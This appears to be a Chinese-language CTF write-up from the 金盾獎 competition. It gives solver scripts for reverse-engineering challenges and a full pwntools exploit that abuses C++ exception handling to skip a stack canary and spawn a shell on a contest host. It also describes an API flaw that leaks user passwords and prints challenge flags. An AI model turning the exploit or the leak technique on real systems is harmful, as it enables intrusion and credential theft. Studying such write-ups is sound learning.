金盾獎 20th - record

Author: 堇姬 Naup

這次跟 @freddy645645、@tyc4d 一起拿了第二名
這次題目蠻不錯的XD
簡單記錄一下過程

順便講個趣聞，我們原本叫想交大的男友了，後來被要求改名變成了 cscxofoobmab

賽前報到

badge，好像還是個悠遊卡

牌子

開賽

首先是有分 CTF 題目跟情境題目，情境題目跟光纖、工控、拆彈有關，不過我對這塊不熟，所以主要打的是 CTF 分類的
首先開賽先看了 score-sys.exe 簡單看一下後可以發現它是一個 pyinstaller，可以用
https://github.com/extremecoders-re/pyinstxtractor/blob/master/pyinstxtractor.py

直接解出 pyc，之後通過 decompile 可以將 source code 還原，他給的其實是一個 GUI，可以去戳遠端 server api，要戳到這個 API 需要 x-activate-code header，快速逆一下就可以找到 code 是 feaa7aa2-2e34-4acf-86a7-f0c0ea012cfe

另外最快速可以發現的問題是
GET /api/v1/users?user_type=teachers&fields=student_id,name,password

這個 API 原本只有設定 student_id 跟 name，但可以額外指定 password，user_type 也可以指定成 teacher 將教師帳號跟學生帳號都打出來，不過到這邊其實我就卡住了，因為不知道要做甚麼，所以先放一放

不過在打這題的同時，我的 agent 把 timespy 這題戳出來了
看起來就是很基本的逆向邏輯而已

BestSSH 是 freddy 解的，是一個 ssh 服務，要打一個 .so
我就跑去看 Abyss Phantom Team，他有一支 binary c8763.exe 跟一看起來被 encrypt 過的檔案 ghost，快速逆後將 data 撈出來就可以生出可以解密 ghost 的腳本，將 ghost.exe 還原回來

#!/usr/bin/env python3
"""
Decrypt the ghost payload from the APT crackme.

Key findings from IDA analysis:
- AES-256-CBC encryption
- Key: "winniepooh" (padded to 32 bytes with zeros)
- First 16 bytes of ciphertext are the IV
- PKCS7 padding
"""

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import sys
import os

def decrypt_ghost(input_file, output_file):
    # Key found in main.main: "winniepooh"
    key = b"winniepooh"
    
    # Pad key to 32 bytes (AES-256) with zeros as seen in decryptAES
    key = key.ljust(32, b'\x00')
    
    # Read encrypted data
    with open(input_file, 'rb') as f:
        ciphertext = f.read()
    
    print(f"[*] Read {len(ciphertext)} bytes from {input_file}")
    
    if len(ciphertext) < 16:
        print("[!] Ciphertext too short (< 16 bytes)")
        return None
    
    # First 16 bytes are the IV
    iv = ciphertext[:16]
    encrypted_data = ciphertext[16:]
    
    print(f"[*] IV (hex): {iv.hex()}")
    print(f"[*] Key (hex): {key.hex()}")
    print(f"[*] Encrypted data size: {len(encrypted_data)} bytes")
    
    # Decrypt using AES-256-CBC
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(encrypted_data)
    
    # Remove PKCS7 padding
    try:
        plaintext = unpad(decrypted, AES.block_size)
    except ValueError as e:
        print(f"[!] Padding error: {e}")
        # Try to continue without unpadding
        plaintext = decrypted
    
    print(f"[*] Decrypted size: {len(plaintext)} bytes")
    
    # Check if it's a PE file
    if plaintext[:2] == b'MZ':
        print("[+] Decrypted data is a PE file (MZ header found)")
        output_file = output_file.replace('.bin', '.exe') if not output_file.endswith('.exe') else output_file
    else:
        print(f"[*] First 16 bytes: {plaintext[:16].hex()}")
    
    # Write decrypted data
    with open(output_file, 'wb') as f:
        f.write(plaintext)
    
    print(f"[+] Decrypted data written to {output_file}")
    
    return plaintext

if __name__ == "__main__":
    input_file = r"c:\Users\naup\Downloads\APT_cschahaha\dist\ghost"
    output_file = r"c:\Users\naup\Downloads\APT_cschahaha\dist\ghost_decrypted.bin"
    
    if len(sys.argv) > 1:
        input_file = sys.argv[1]
    if len(sys.argv) > 2:
        output_file = sys.argv[2]
    
    decrypt_ghost(input_file, output_file)

執行後是一個 password checker，MCP 快速的就可以把所有條件拉下來寫腳本了，就可以找到 password

#!/usr/bin/env python3

from itertools import product

# Z3 import is optional for advanced solving
try:
    from z3 import *
    Z3_AVAILABLE = True
except ImportError:
    Z3_AVAILABLE = False

def solve_with_z3():
    """Solve the constraint system using Z3 SMT solver"""
    if not Z3_AVAILABLE:
        print("[-] Z3 not available")
        return None
    
    # Create 15 integer variables for password characters
    p = [Int(f'p{i}') for i in range(15)]
    
    s = Solver()
    
    # Character type constraints
    # p[0..2]: uppercase A-Z (65-90)
    for i in range(3):
        s.add(p[i] >= 65, p[i] <= 90)
    
    # p[3..6]: digits 0-9 (48-57)
    for i in range(3, 7):
        s.add(p[i] >= 48, p[i] <= 57)
    
    # p[7..14]: uppercase A-Z (65-90)
    for i in range(7, 15):
        s.add(p[i] >= 65, p[i] <= 90)
    
    # Constraint 2: Sum of all bytes == 1045
    s.add(Sum(p) == 1045)
    
    # Constraint 3: p[0] XOR p[1] XOR p[2] XOR p[3] == 97 ('a')
    s.add(p[0] ^ p[1] ^ p[2] ^ p[3] == 97)
    
    # Constraint 6: XOR of all bytes == 73 ('I')
    xor_all = p[0]
    for i in range(1, 15):
        xor_all = xor_all ^ p[i]
    s.add(xor_all == 73)
    
    # Constraint 10: p[0] + p[1] + p[2] == 217
    s.add(p[0] + p[1] + p[2] == 217)
    
    # Constraint 11: p[3] + p[4] + p[5] + p[6] == 201
    s.add(p[3] + p[4] + p[5] + p[6] == 201)
    
    # Constraint 12: sum(p[7..14]) == 627
    s.add(Sum([p[i] for i in range(7, 15)]) == 627)
    
    # Constraint 13: p[2] == p[0] (first letter equals third)
    s.add(p[2] == p[0])
    
    # Constraint 14: p[5] == p[3]
    s.add(p[5] == p[3])
    
    # Constraint 15: p[9] == p[10]
    s.add(p[9] == p[10])
    
    # Constraint 16: p[0] XOR p[1] XOR p[2] == 83 ('S')
    s.add((p[0] ^ p[1] ^ p[2]) == 83)
    
    # Constraint 17: p[4] XOR p[5] XOR p[3] XOR p[6] == 5
    s.add((p[4] ^ p[5] ^ p[3] ^ p[6]) == 5)
    
    # Constraint 18: XOR of p[7..14] == 31
    xor_7_14 = p[7]
    for i in range(8, 15):
        xor_7_14 = xor_7_14 ^ p[i]
    s.add(xor_7_14 == 31)
    
    # Constraint 20: p[8] XOR p[7] == 17
    s.add((p[8] ^ p[7]) == 17)
    
    # Constraint 22: p[12] XOR p[11] == 24
    s.add((p[12] ^ p[11]) == 24)
    
    # Constraint 23: p[11] > p[12]
    s.add(p[11] > p[12])
    
    # Constraint 24: p[4] < p[6]
    s.add(p[4] < p[6])
    
    # Constraint 25: p[13] > p[14]
    s.add(p[13] > p[14])
    
    # Constraint 30: XOR of even-indexed chars == 28
    xor_even = p[0]
    for i in range(2, 15, 2):
        xor_even = xor_even ^ p[i]
    s.add(xor_even == 28)
    
    # Constraint 31: XOR of odd-indexed chars (starting from p[1]) through p[13] == 85
    # Note: the code says starting at index 3 with step 2 through 13
    xor_odd = p[1]
    for i in range(3, 14, 2):
        xor_odd = xor_odd ^ p[i]
    s.add(xor_odd == 85)
    
    print("[*] Solving with Z3...")
    
    if s.check() == sat:
        m = s.model()
        password = ''.join(chr(m[p[i]].as_long()) for i in range(15))
        print(f"[+] Z3 Solution found: {password}")
        return password
    else:
        print("[-] No solution found with Z3")
        return None


def verify_password(password):
    """Verify the password against all constraints"""
    if len(password) != 15:
        return False, "Length must be 15"
    
    p = [ord(c) for c in password]
    
    checks = []
    
    # Check 1: Length == 15
    checks.append(("Length == 15", len(password) == 15))
    
    # Check 2: Sum == 1045
    checks.append(("Sum == 1045", sum(p) == 1045))
    
    # Check 3: p[0]^p[1]^p[2]^p[3] == 97
    checks.append(("XOR[0-3] == 97", (p[0] ^ p[1] ^ p[2] ^ p[3]) == 97))
    
    # Check 4: (p[4]*p[5]*p[6]*p[7]) & 0xFF == 0
    checks.append(("Product[4-7] mod 256 == 0", ((p[4] * p[5] * p[6] * p[7]) & 0xFF) == 0))
    
    # Check 5: sum(p[i]^2 for i in 7..14) mod 100 == 61
    sum_sq_7_14 = sum(p[i]**2 for i in range(7, 15))
    checks.append(("Sum sq[7-14] mod 100 == 61", sum_sq_7_14 % 100 == 61))
    
    # Check 6: XOR all == 73
    xor_all = 0
    for x in p:
        xor_all ^= x
    checks.append(("XOR all == 73", xor_all == 73))
    
    # Check 7: p[0..2] uppercase
    checks.append(("p[0-2] uppercase", all(65 <= p[i] <= 90 for i in range(3))))
    
    # Check 8: p[3..6] digits
    checks.append(("p[3-6] digits", all(48 <= p[i] <= 57 for i in range(3, 7))))
    
    # Check 9: p[7..14] uppercase
    checks.append(("p[7-14] uppercase", all(65 <= p[i] <= 90 for i in range(7, 15))))
    
    # Check 10: p[0]+p[1]+p[2] == 217
    checks.append(("Sum[0-2] == 217", p[0] + p[1] + p[2] == 217))
    
    # Check 11: p[3]+p[4]+p[5]+p[6] == 201
    checks.append(("Sum[3-6] == 201", p[3] + p[4] + p[5] + p[6] == 201))
    
    # Check 12: sum(p[7..14]) == 627
    checks.append(("Sum[7-14] == 627", sum(p[7:15]) == 627))
    
    # Check 13: p[2] == p[0]
    checks.append(("p[2] == p[0]", p[2] == p[0]))
    
    # Check 14: p[5] == p[3]
    checks.append(("p[5] == p[3]", p[5] == p[3]))
    
    # Check 15: p[9] == p[10]
    checks.append(("p[9] == p[10]", p[9] == p[10]))
    
    # Check 16: p[0]^p[1]^p[2] == 83
    checks.append(("XOR[0-2] == 83", (p[0] ^ p[1] ^ p[2]) == 83))
    
    # Check 17: p[4]^p[5]^p[3]^p[6] == 5
    checks.append(("XOR[3-6] == 5", (p[4] ^ p[5] ^ p[3] ^ p[6]) == 5))
    
    # Check 18: XOR(p[7..14]) == 31
    xor_7_14 = 0
    for i in range(7, 15):
        xor_7_14 ^= p[i]
    checks.append(("XOR[7-14] == 31", xor_7_14 == 31))
    
    # Check 19: (p[4]*p[3]*p[5]*p[6]) mod 256 == 192
    checks.append(("Product[3-6] mod 256 == 192", (p[4] * p[3] * p[5] * p[6]) % 256 == 192))
    
    # Check 20: p[8] ^ p[7] == 17
    checks.append(("p[8]^p[7] == 17", (p[8] ^ p[7]) == 17))
    
    # Check 21: p[8] * p[7] * p[9] == 431600
    checks.append(("p[8]*p[7]*p[9] == 431600", p[8] * p[7] * p[9] == 431600))
    
    # Check 22: p[12] ^ p[11] == 24
    checks.append(("p[12]^p[11] == 24", (p[12] ^ p[11]) == 24))
    
    # Check 23: p[11] > p[12]
    checks.append(("p[11] > p[12]", p[11] > p[12]))
    
    # Check 24: p[4] < p[6]
    checks.append(("p[4] < p[6]", p[4] < p[6]))
    
    # Check 25: p[13] > p[14]
    checks.append(("p[13] > p[14]", p[13] > p[14]))
    
    # Check 26: sum(p[i]^3 for i in 0..6) == 1682782
    sum_cube_0_6 = sum(p[i]**3 for i in range(7))
    checks.append(("Sum cube[0-6] == 1682782", sum_cube_0_6 == 1682782))
    
    # Check 27: sum(p[i]^3 for i in 7..14) == 3947541
    sum_cube_7_14 = sum(p[i]**3 for i in range(7, 15))
    checks.append(("Sum cube[7-14] == 3947541", sum_cube_7_14 == 3947541))
    
    # Check 28: (p[0]*p[1]*p[2]*p[3]*p[4]) mod 1000 == 800
    checks.append(("Product[0-4] mod 1000 == 800", (p[0] * p[1] * p[2] * p[3] * p[4]) % 1000 == 800))
    
    # Check 29: sum of p[i]*p[i+1] for i=7..13 (ALL consecutive pairs) == 43632
    consec_prod = sum(p[i]*p[i+1] for i in range(7, 14))
    checks.append(("Consec products == 43632", consec_prod == 43632))
    
    # Check 30: XOR even-indexed == 28
    xor_even = 0
    for i in range(0, 15, 2):
        xor_even ^= p[i]
    checks.append(("XOR even == 28", xor_even == 28))
    
    # Check 31: XOR odd-indexed (1,3,5,...,13) == 85
    xor_odd = 0
    for i in range(1, 14, 2):
        xor_odd ^= p[i]
    checks.append(("XOR odd == 85", xor_odd == 85))
    
    # Check 32: sum(p[i]^2 for i in 0..2) mod 100 == 67
    sum_sq_0_2 = sum(p[i]**2 for i in range(3))
    checks.append(("Sum sq[0-2] mod 100 == 67", sum_sq_0_2 % 100 == 67))
    
    # Check 33: (p[10]*p[11]*p[12]*p[13]) mod 10000 == 7638
    checks.append(("Product[10-13] mod 10000 == 7638", (p[10] * p[11] * p[12] * p[13]) % 10000 == 7638))
    
    print("\n[*] Verification Results:")
    all_passed = True
    for name, result in checks:
        status = "✓" if result else "✗"
        print(f"  {status} {name}: {result}")
        if not result:
            all_passed = False
    
    return all_passed, checks


def brute_force_solve():
    """
    Solve using constraint propagation and targeted search.
    This avoids full brute force by using the tight constraints.
    """
    print("[*] Solving using constraint analysis...")
    
    # From constraints, we can deduce:
    # p[2] == p[0] (Check 13)
    # p[5] == p[3] (Check 14)
    # p[9] == p[10] (Check 15)
    
    # From Check 10 & 16: p[0] + p[1] + p[2] = 217 and p[0]^p[1]^p[2] = 83
    # Since p[2] = p[0]: 2*p[0] + p[1] = 217, so p[1] = 217 - 2*p[0]
    # Also p[0]^p[1]^p[0] = p[1] = 83
    # So p[1] = 83!
    
    p1 = 83  # 'S'
    # 2*p[0] + 83 = 217 => p[0] = 67 = 'C'
    p0 = 67  # 'C'
    p2 = p0  # 'C'
    
    print(f"[*] Derived: p[0]={chr(p0)}, p[1]={chr(p1)}, p[2]={chr(p2)}")
    
    # From Check 11: p[3] + p[4] + p[5] + p[6] = 201
    # p[5] = p[3], so: 2*p[3] + p[4] + p[6] = 201
    
    # From Check 17: p[4] ^ p[5] ^ p[3] ^ p[6] = 5
    # p[5] = p[3], so: p[4] ^ p[3] ^ p[3] ^ p[6] = p[4] ^ p[6] = 5
    
    # From Check 24: p[4] < p[6]
    
    # Try digit combinations where p[4] ^ p[6] = 5 and p[4] < p[6]
    valid_digit_pairs = []
    for d4 in range(48, 58):  # '0' to '9'
        for d6 in range(48, 58):
            if (d4 ^ d6) == 5 and d4 < d6:
                valid_digit_pairs.append((d4, d6))
    
    print(f"[*] Valid (p[4], p[6]) pairs: {[(chr(a), chr(b)) for a, b in valid_digit_pairs]}")
    
    # From Check 3: p[0]^p[1]^p[2]^p[3] = 97
    # 67^83^67^p[3] = 97 => 83^p[3] = 97 => p[3] = 83^97 = 50 = '2'
    p3 = 83 ^ 97  # = 50 = '2'
    p5 = p3  # '2'
    
    print(f"[*] Derived: p[3]={chr(p3)} ({p3}), p[5]={chr(p5)}")
    
    # Now: 2*p[3] + p[4] + p[6] = 201
    # 2*50 + p[4] + p[6] = 201 => p[4] + p[6] = 101
    
    # Find pairs where p[4] + p[6] = 101 and p[4] ^ p[6] = 5 and p[4] < p[6]
    for d4, d6 in valid_digit_pairs:
        if d4 + d6 == 101:
            p4, p6 = d4, d6
            print(f"[*] Found: p[4]={chr(p4)}, p[6]={chr(p6)}")
            break
    else:
        print("[-] No valid p[4], p[6] found")
        return None
    
    # Check 19: (p[4]*p[3]*p[5]*p[6]) mod 256 = 192
    prod = p4 * p3 * p5 * p6
    if prod % 256 != 192:
        print(f"[-] Check 19 failed: {prod % 256} != 192")
        return None
    
    # Check 4: (p[4]*p[5]*p[6]*p[7]) & 0xFF = 0
    # We need p[4]*p[5]*p[6]*p[7] to be divisible by 256
    # p[4]*p[5]*p[6] = p4 * p5 * p6
    prod_4_5_6 = p4 * p5 * p6
    print(f"[*] p[4]*p[5]*p[6] = {prod_4_5_6}")
    # For product to be div by 256, we need (prod_4_5_6 * p[7]) % 256 = 0
    # p[7] must be uppercase: 65-90
    
    # Check 21: p[8] * p[7] * p[9] = 431600
    # Check 20: p[8] ^ p[7] = 17
    
    # Find p[7], p[8], p[9] such that:
    # - p[7], p[8], p[9] are uppercase (65-90)
    # - p[8] ^ p[7] = 17
    # - p[8] * p[7] * p[9] = 431600
    # - (p4 * p5 * p6 * p[7]) % 256 = 0
    
    valid_p7_p8 = []
    for p7 in range(65, 91):
        p8 = p7 ^ 17
        if 65 <= p8 <= 90:
            # Check if 431600 / (p7 * p8) is an integer in range 65-90
            if 431600 % (p7 * p8) == 0:
                p9 = 431600 // (p7 * p8)
                if 65 <= p9 <= 90:
                    # Check constraint 4
                    if (prod_4_5_6 * p7) % 256 == 0:
                        valid_p7_p8.append((p7, p8, p9))
    
    print(f"[*] Valid (p[7], p[8], p[9]): {[(chr(a), chr(b), chr(c)) for a, b, c in valid_p7_p8]}")
    
    if not valid_p7_p8:
        print("[-] No valid p[7], p[8], p[9] found")
        return None
    
    # For each valid tuple, continue solving
    for p7, p8, p9 in valid_p7_p8:
        p10 = p9  # Check 15: p[9] == p[10]
        
        # Check 22: p[12] ^ p[11] = 24
        # Check 23: p[11] > p[12]
        valid_p11_p12 = []
        for p11 in range(65, 91):
            p12 = p11 ^ 24
            if 65 <= p12 <= 90 and p11 > p12:
                valid_p11_p12.append((p11, p12))
        
        print(f"[*] Valid (p[11], p[12]): {[(chr(a), chr(b)) for a, b in valid_p11_p12]}")
        
        # Check 12: sum(p[7..14]) = 627
        # p[7] + p[8] + p[9] + p[10] + p[11] + p[12] + p[13] + p[14] = 627
        # We know p[7], p[8], p[9], p[10]
        sum_known = p7 + p8 + p9 + p10
        # p[11] + p[12] + p[13] + p[14] = 627 - sum_known
        remaining = 627 - sum_known
        
        # Check 25: p[13] > p[14]
        for p11, p12 in valid_p11_p12:
            sum_13_14 = remaining - p11 - p12
            
            # Check 33: (p[10]*p[11]*p[12]*p[13]) % 10000 = 7638
            # For each valid p[13] in range(65, 90):
            for p13 in range(66, 91):  # p[13] > p[14], so p[13] >= 66
                p14 = sum_13_14 - p13
                if not (65 <= p14 <= 90):
                    continue
                if not (p13 > p14):  # Check 25
                    continue
                
                # Check 33
                if (p10 * p11 * p12 * p13) % 10000 != 7638:
                    continue
                
                # Build password
                pwd = [p0, p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13, p14]
                
                # Check 29: sum of ALL consecutive products p[i]*p[i+1] for i=7..13 == 43632
                consec_prod = sum([pwd[i]*pwd[i+1] for i in range(7, 14)])
                
                # Debug: print candidate
                password = ''.join(chr(c) for c in pwd)
                print(f"[DEBUG] Candidate: {password}, consec_prod={consec_prod} (need 43632)")
                
                if consec_prod != 43632:
                    continue
                
                # Build password and verify
                
                # Verify all constraints
                passed, _ = verify_password(password)
                if passed:
                    print(f"\n[+] PASSWORD FOUND: {password}")
                    return password
    
    print("[-] No solution found")
    return None


if __name__ == "__main__":
    print("=" * 60)
    print("Ghost Crackme Password Solver")
    print("=" * 60)
    
    password = brute_force_solve()
    
    if password:
        print(f"\n{'=' * 60}")
        print(f"[+] SOLUTION: {password}")
        print(f"{'=' * 60}")
    else:
        if Z3_AVAILABLE:
            print("\n[-] Failed to find password, trying Z3...")
            password = solve_with_z3()
            if password:
                print(f"\n[*] Verifying Z3 solution...")
                verify_password(password)
        else:
            print("\n[-] Z3 not available, install with: pip install z3-solver")

跑完後你會發現他除了告訴你 success 沒有跑出 flag，稍微看一下邏輯可以知道他會寫檔案到你電腦神秘位置的 flag.txt
所以我用 everything 直接搜就可以找到了

v54[0] = v51;
v54[1] = 2LL;
v54[2] = "flag.txt";
v54[3] = 8LL;
v50 = path_filepath_join((unsigned int)v54, 2, 2, a4, a5, v28, v29, v30, v31);
v36 = runtime_stringtoslicebyte(0, v52, a2, a4, a5, v32, v33, v34, v35);
v41 = os_WriteFile(v50, 2, v36, v52, v37, 420, v38, v39, v40, v46, v47, v48, v49);
if ( v41 )

在解 APT 的時候兩個隊友去打情境題的工控了，對這塊不熟交給隊友

解完這題我就去看 PlayShaMiGame
首先有一個 IDOR 可以在 web 上撈到這個遊戲的 binary，他是一個 menu，快速逆向後可以定位到在第三個選項的 special kill 中
這題 no pie 但有開 canary

char input_buffer[264]; // [rsp+20h] [rbp-110h] BYREF
unsigned __int64 v9; // [rsp+128h] [rbp-8h]

v9 = __readfsqword(0x28u);
std::operator<<<std::char_traits<char>>(&std::cout, "Enter the power calibration value for the energy crystal:\n");
fflush(stdout);
bytes_read = read(0, input_buffer, 0x200uLL); // read(0, buf, 0x200) - reads up to 512 bytes of user input
if ( bytes_read > 0 && input_buffer[bytes_read - 1] == 10 )
{
  input_buffer[bytes_read - 1] = 0;
}
else if ( bytes_read > 0 )
{
  input_buffer[bytes_read] = 0;
}
user_input = atoll(input_buffer);             // user_input = atoll(buf) - converts input string to 64-bit integer
computed_result = 3 * user_input * user_input;// result = 3 * user_input * user_input (with 64-bit overflow possible)
if ( computed_result == 0xB5F72F1DED389973LL )// KEY CHECK: if (3*input*input == MAGIC) throw Crystal Overload exception
{
  exception = __cxa_allocate_exception(8uLL);
  *exception = "Crystal Overload!";
  __cxa_throw(exception, (struct type_info *)&`typeinfo for'char const*, 0LL);// Throws 'Crystal Overload!' exception (const char*)
}

並且可以在這個位置上找到 win function，這東西應該是在 try-catch 中的 win function 可以開 shell，到這邊應該很明顯了

.text:00000000004021A4                 lea     rsi, aEnteringDebugM ; "[*] Entering debug mode "
.text:00000000004021AB                 lea     rdi, _ZSt4cout@@GLIBCXX_3_4
.text:00000000004021B2                 call    __ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::ostream &,char const*)
.text:00000000004021B7                 mov     rdx, rax
.text:00000000004021BA                 mov     rax, cs:_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6__ptr
.text:00000000004021C1                 mov     rsi, rax
.text:00000000004021C4                 mov     rdi, rdx
.text:00000000004021C7                 call    __ZNSolsEPFRSoS_E ; std::ostream::operator<<(std::ostream & (*)(std::ostream &))
.text:00000000004021CC                 lea     rdi, command    ; GOAL: system("/bin/sh") - Spawns shell if exception is caught here
.text:00000000004021D3                 call    _system
.text:00000000004021D3 ;   }

首先是可以通過觸發 exception 來去 bypass canary 來通過跳位於 catch 中的 win function 來 get shell
要觸發 exception 可以通過輸入 133713371337 這個數字
前面可以 padding 一些 0，變成 0000133713371337，後面的東西會被 atoll 截斷
接下來是中間跟 saved rbp 我都 padding 了一個可寫的 address，不然會戳到奇怪的 address 就 crash
最後跳到 win function 特定的地方就可以拿到 shell 了

540 分 get

from pwn import *
import time

def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

def p(r):
    gdb.attach(r)

def p_c(r,cmd):
    gdb.attach(r,cmd)

def split_nc(nc_str):
    nc_str=nc_str.split(" ")
    return [nc_str[1],nc_str[2]]

context(arch = 'amd64', os = 'linux')


REMOTE_LOCAL=input("local?(y/n):")

if REMOTE_LOCAL=="y":
    r=process('./PlayShaMiGame_Server_Debug')
    a=input('open debug?(y/n/srop)')
    if a=='y':
        context.log_level = 'debug'
        context.terminal = ['tmux', 'splitw', '-h']

    elif a=='srop':
        context.log_level = 'debug'
        context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']
    
else:                                           
    REMOTE_INFO=split_nc("nc 192.168.100.121 40013")

    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])

    r=remote(REMOTE_IP,REMOTE_PORT)

### attach
if input('attach?(y/n)') == 'y':
    p(r)
  

### exploit

sla(b"Enter your name, Knight: ", b"naup")
sla(b"Your choice: ", b"3")
#  + p64(0x405ac0) * (0x130 // 0x8)
sla(b"Enter the power calibration value for the energy crystal:\n", b"0000133713371337" + p64(0x405ac0) * (0x100 // 0x8) + p64(0x405ac0) + p64(0x40212d + 0x1))

### interactive
ita()

# CSC{c++_Exc3pt1On_h4ndl1ng_IS_4_feAtUrE_nOt_A_bug}

接下來過了一段時間 @tyc4d 成功首殺了光纖攔截的題目，太強了 orz
我在看 llm-this，這題是一個加過 upx 殼 ELF 的逆向題目，不過沒有辦法直接用 upx -d 脫掉，這時候就開脫殼

基本上可以通過將 write syscall 下 catch，可以看到有兩塊有可執行的區段，這兩段 code memory dump 下來就是邏輯了，不過其實第一塊的才是重點，但你不在 /tmp/2404917857 寫東西他不會出現，這是我踩的第一個坑，沒去看 strace 出來的東西

0x7ffff7ff1000     0x7ffff7ff2000 r-xp     1000       0 /memfd:upX (deleted)
0x7ffff7ff2000     0x7ffff7ff6000 r--p     4000       0 [vvar]
0x7ffff7ff6000     0x7ffff7ff8000 r-xp     2000       0 [vdso]
0x7ffff7ff8000     0x7ffff7ff9000 r--p     1000       0 [anon_7ffff7ff8]
0x7ffff7ff9000     0x7ffff7ffa000 r-xp     1000       0 /memfd:upx (deleted)

如果去解第二段記憶體的驗證邏輯可以得到一個假的 flag
第一段驗證邏輯 dump 下來拖到 IDA 就是很簡單的 xor 逆推了，將結果放到 /tmp/2404917857 下後，執行就可以看到 flag 被寫到 /tmp/3404927857 了

1 2	naup@naup-virtual-machine:~/Desktop/csc$ cat /tmp/3404927857 CSC{l0ng_1Iv3_rev3rs3_3ng!nEer5_9beff18934}

另外還有一些題目 @freddy 也收掉了，那時候在最後半小時開了 goldocs 的教學文件，結果超複雜，應該早點開的
最後壓線在解拆彈，簡單來說就是逆向要剪的線，按照順序用剪刀將線依序不同的 GPIO 上的剪掉，如果剪錯爆炸要拿去給主辦方刷新，每組有 3 次機會，那時候 @tyc4d 說他逆向完要剪的線，結果錯了
後來我也丟下去逆了一下發現跑出來一樣，那感覺問題就是剪錯線了

#!/usr/bin/env python3
"""
CSC Bomb Solver - 計算拆線順序
用法: python solve.py <seedString>
"""

import hashlib
import sys

# Pin 對應表 (index -> GPIO)
CHECK_PINS = [8, 9, 10, 11, 12, 13, 14, 15, 0, 22, 21, 20, 19, 18, 17, 16]
NUM_PINS = 16


def calculate_pins_order(seed_string: str) -> list[int]:
    """
    根據 seedString 計算拆線順序
    """
    # 1. 雙重 SHA512 雜湊
    hash1 = hashlib.sha512(seed_string.encode('latin-1')).digest()
    hash2 = hashlib.sha512(hash1).digest()
    
    # 2. 將 512 bits 分配到 16 個累加器
    pins_order = [0] * NUM_PINS
    
    for i in range(64):  # 64 bytes
        for j in range(8):  # 8 bits per byte
            pin_idx = (i * 8 + j) % NUM_PINS
            if hash2[i] & (1 << j):
                pins_order[pin_idx] += 1
    
    # 3. 轉換為排名 (最小值=1，相同值時先出現的排前面)
    # 建立 (value, original_index) 配對
    pairs = [(pins_order[i], i) for i in range(NUM_PINS)]
    
    # 按 value 排序，相同 value 則按 index 排序
    pairs.sort(key=lambda x: (x[0], x[1]))
    
    # 分配排名
    ranks = [0] * NUM_PINS
    for rank, (_, original_idx) in enumerate(pairs, start=1):
        ranks[original_idx] = rank
    
    return ranks


def main():
    if len(sys.argv) < 2:
        print("用法: python solve.py <seedString>")
        print("範例: python solve.py 0123456789abcdef")
        sys.exit(1)
    
    seed_string = sys.argv[1]
    pins_order = calculate_pins_order(seed_string)
    
    print(f"\n{'='*50}")
    print(f"Seed String: {seed_string}")
    print(f"{'='*50}\n")
    
    # 建立 (順序, index, GPIO) 列表並按順序排序
    order_list = [(pins_order[i], i, CHECK_PINS[i]) for i in range(NUM_PINS)]
    order_list.sort(key=lambda x: x[0])  # 按拆除順序排序
    
    print("拆線順序 (由先到後):")
    print("-" * 40)
    print(f"{'順序':<6} {'Index':<8} {'GPIO Pin':<10}")
    print("-" * 40)
    
    for order, idx, gpio in order_list:
        print(f"{order:<6} {idx:<8} GPIO {gpio:<6}")
    
    print("-" * 40)
    
    # 顯示對應螢幕位置
    print("\n螢幕顯示對應 (o=連接, x=斷開):")
    print("Row 1: Index 0-7  → GPIO", CHECK_PINS[0:8])
    print("Row 2: Index 8-15 → GPIO", CHECK_PINS[8:16])
    
    print("\n拆線順序 (螢幕位置):")
    for order, idx, gpio in order_list:
        row = 1 if idx < 8 else 2
        col = idx if idx < 8 else idx - 8
        print(f"  第 {order:2} 條: Row {row}, 位置 {col+1} (GPIO {gpio})")


if __name__ == "__main__":
    main()

後來極限 3 分鐘剪完線，1 分鐘送 flag，在最後兩分鐘成功把這題解出來
這邊說一下，一開始解的那堤貌似就差要看到他有一個 debug server 是 django 然後就可以解出來了

因為最後 30 分鐘會凍記分板，所以不知道結果，不過我們已經超越凍板前第一了，所以就看其他隊伍如何了

頒獎

總之最後拿下了第二

漂亮獎盃

吃飯 & 吃飯

接下來就是主辦方有提供一些活動跟晚宴可以吃，就到處聊天跟吃飯
晚上跟 @chumy @vincent66 @ching @curious @shallowfeather 去吃了一間蠻不錯的冰，吃的很爽XD

afterall

好玩 ~